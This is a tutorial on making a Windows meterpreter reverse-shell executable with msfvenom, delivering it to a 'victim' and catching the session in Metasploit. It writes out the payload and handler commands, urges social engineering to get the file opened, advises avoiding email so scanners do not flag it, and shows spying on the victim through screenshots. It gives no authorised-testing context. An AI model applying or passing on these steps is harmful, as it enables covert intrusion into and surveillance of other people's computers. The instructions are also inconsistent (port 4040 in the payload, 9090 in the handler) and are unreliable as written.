Deploying a Payload with Metasploit in Kali Linux

A Metasploit framework is an open-Source tool that is developed and maintained by rapid7. It is a very powerful tool used by almost all penetration testers to scan for vulnerabilities in their system. Metasploit-framework has about 500+ payloads and over 1677 exploits organized for different platforms, including Android, PHP, Python, Java, etc. 

Metasploit-framework has various tools that can do different tasks including Port-Scanning, OS fingerprinting or vulnerability, etc. 

 

What is a Payload?

A payload is nothing but just like a carrier that carries malware to deliver to the victim. Payloads can be made easily and are very dangerous, the danger part is that many systems can’t even scan if a file contains a payload or not. The payload can be of any format pdf, exe and even it can be embedded in pictures also like .jpg, .png, etc. Payloads can also be attached to any file and the victim can’t even know. Payloads are of very small size so it is literally very difficult to know.

Now we will install and run Metasploit on our system, we are using Kali Linux but the process is the same for all Debian users.

Deploying a Payload with Metasploit

Step 1: Installing Metasploit-framework

Almost all Debian based O.S has Metasploit-framework pre-installed in it, but if anyone did not have one follow the steps:-

Fire up your terminal by ctrl+alt+t and write

sudo apt install metasploit-framework -y

 

It will take some time as per your internet connection.

Once it is installed you can try launching it by typing

msfconsole

 

Note: Every time you will launch msfconsole it will show random welcome messages which are very cool!

Now we will be creating payloads for windows, so let’s start making

Step 2: Creating Payload with msfvenom

msfvenom is a tool in the Metasploit toolkit which are used to make payloads, so make the payload by using the following command in the terminal:-

msfvenom -p windows/meterpreter/reverse_tcp lhost=[Your ip address] lport=4040 -f exe R>[location to save payload]/gfg.exe

 

Note: You can know your IP address by typing ‘ifconfig’ in your terminal.

Step 3: Sending payload to the victim.

Now it is your turn to show some social engineering skills, if you know your victim send him this payload saying it is a special program of gfg or anything that he/she is interested in.

Note: Do not send this payload via E-mail service directly as E-mail can scan this and alert the victim that it is a virus.

Now, after sending the payload we need to set up the environment for us to grab a session of the victim.

This is what your payload will look like:

 

So, as soon as the victim opens a link it will direct a connection to your IP Address 

Step 4: Setting up our environment for the Victim

Now in the terminal type 

msfconsole 

it will start the Metasploit-framework environment for you, now follow the steps:

you will see msf> like this in your terminal

msf6> use exploit/multi/handler
msf6> set payload windows/meterpreter/reverse_tcp
msf6> set LHOST <your ip>
msf6> set LPORT 9090
msf6> exploit -j

 

As soon as the victim opens your payload you will be prompted to a meterpreter session.

This is the windows system we were exploiting, look carefully we have gained access to its Command prompt and we can do whatever we want with this

 

You can see all the commands with the help button and see how we can access the victim’s computer, let us show you a demo,

 

As you will see this command will take a screenshot of the victim’s computer and will show what the victim is doing, you can see the screenshot in the location displayed in it.